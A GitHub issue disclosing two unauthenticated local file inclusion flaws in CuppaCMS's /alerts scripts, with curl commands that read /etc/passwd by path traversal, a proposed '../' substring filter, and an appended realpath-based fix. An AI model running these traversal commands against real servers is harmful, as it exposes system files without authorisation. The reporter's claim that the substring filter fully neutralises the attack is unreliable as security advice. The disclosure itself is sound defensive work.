Multiple non authenticated local file inclusions found in /alerts #15

Open
hansmach1ne opened this issue Jan 4, 2022 · 2 comments

@hansmach1ne

Greetings, I found an LFI vulnerability in CuppaCMS. How exactly is the disclosure process done? Can you provide me an email where I can contact you with the details?

@hansmach1ne hansmach1ne changed the title Non authenticated local file inclusion Multiple non authenticated local file inclusions found Jan 4, 2022
@hansmach1ne

Since everybody is publicly exposing vulnerabilities, I am going to assume there is no advisory or disclosure policy.

Details:
Multiple Local File Inclusion vulnerabilities have been found in CuppaCMS /alerts scripts.

  1. '/alerts/alertConfigField.php' script suffers from a Local File Inclusion vulnerability via the $_POST['urlConfig'] parameter. I can see there is a history of a similar vulnerability in the same script, but it was not fixed properly. The parameter should be further sanitized.
    Replication: Use: curl -X POST "http://IP/CuppaCMS/alerts/alertConfigField.php" -d "urlConfig=../../../../../../../../../etc/passwd"

  2. '/alerts/alertLightbox.php' script suffers from a Local File Inclusion vulnerability via the $_POST['url'] parameter. The parameter should be sanitized.
    Replication: Use: curl -X POST "http://IP/CuppaCMS/alerts/alertLightbox.php" -d "url=../../../../../../../../../etc/passwd"

PoC: (screenshot)

Reference and proof of concept: https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts
Disclosure date: 4th January, 2022
Author: Mateo Hanžek

@hansmach1ne hansmach1ne changed the title Multiple non authenticated local file inclusions found Multiple non authenticated local file inclusions found in /alerts Jan 6, 2022
hansmach1ne commented Jan 8, 2022

@tufik2 These two vulnerabilities have pretty high severity and should be fixed ASAP.
This is my possible solution for these security issues: sanitization of the $_POST variables against a path truncation attack.

  1. Script 'alerts/alertConfigField.php', line 77. My suggestion is to add the following:

    <?php
    $url = $_POST['urlConfig'];
    // Reject any value containing a parent-directory segment ("../" or "..\").
    if (strstr($url, "../") || strstr($url, "..\\")) {
        echo "Security attack!";
        exit;
    }
    include "../components/table_manager/fields/config/" . $url;

  2. Script 'alerts/alertLightbox.php', line 113. My suggestion is to add the following:

    <?php
    $url = $_POST['url'];
    // Same check as above, applied before the path is joined to the document root.
    if (strstr($url, "../") || strstr($url, "..\\")) {
        echo "Security attack!";
        exit;
    }
    include $cuppa->getDocumentPath() . $url;

This will completely neutralize any sort of path truncation LFI attack in these 2 parameters.
Hope this helped. I would like to report this to MITRE for a CVE ID after a patch. Looking forward to your response.
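A stricter alternative to the "../" substring check in the comment above, added here as an example and not part of CuppaCMS or the reporter's patch: it reduces the request value to a bare file name, resolves it with realpath(), and includes it only if the result is still inside the intended directory. The `$baseDir` value and the `.php` naming rule are assumptions for illustration.

```php
<?php
// Added example, not CuppaCMS code: an allowlist-style replacement for the
// "../" substring check. The request value is reduced to a bare file name,
// checked against an expected pattern, resolved with realpath(), and only
// included if the resolved path is still inside the intended directory.
// $baseDir and the ".php" naming rule are assumptions for illustration.

function resolveInsideDir(string $baseDir, string $userPath): ?string
{
    // The base directory must exist and canonicalise cleanly.
    $realBase = realpath($baseDir);
    if ($realBase === false) {
        return null;
    }

    // Keep only the file-name component; any directory part the client
    // supplied (including "..") is discarded rather than filtered.
    $name = basename($userPath);

    // Accept only the shape of names this script is meant to load.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $name)) {
        return null;
    }

    // Resolve symlinks and normalise the final path.
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return null; // no such file
    }

    // Containment check: the resolved file must sit under $realBase.
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage in alertConfigField.php, replacing the raw include:
$baseDir = __DIR__ . '/../components/table_manager/fields/config'; // assumed
$target  = resolveInsideDir($baseDir, (string) ($_POST['urlConfig'] ?? ''));
if ($target === null) {
    http_response_code(400);
    exit('Invalid configuration file');
}
include $target;
```

Because the directory part is dropped before any lookup, a value such as `../../etc/passwd` is reduced to `passwd`, fails the name pattern, and never reaches include; a symlink inside the directory that points outside it is caught by the final containment check.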
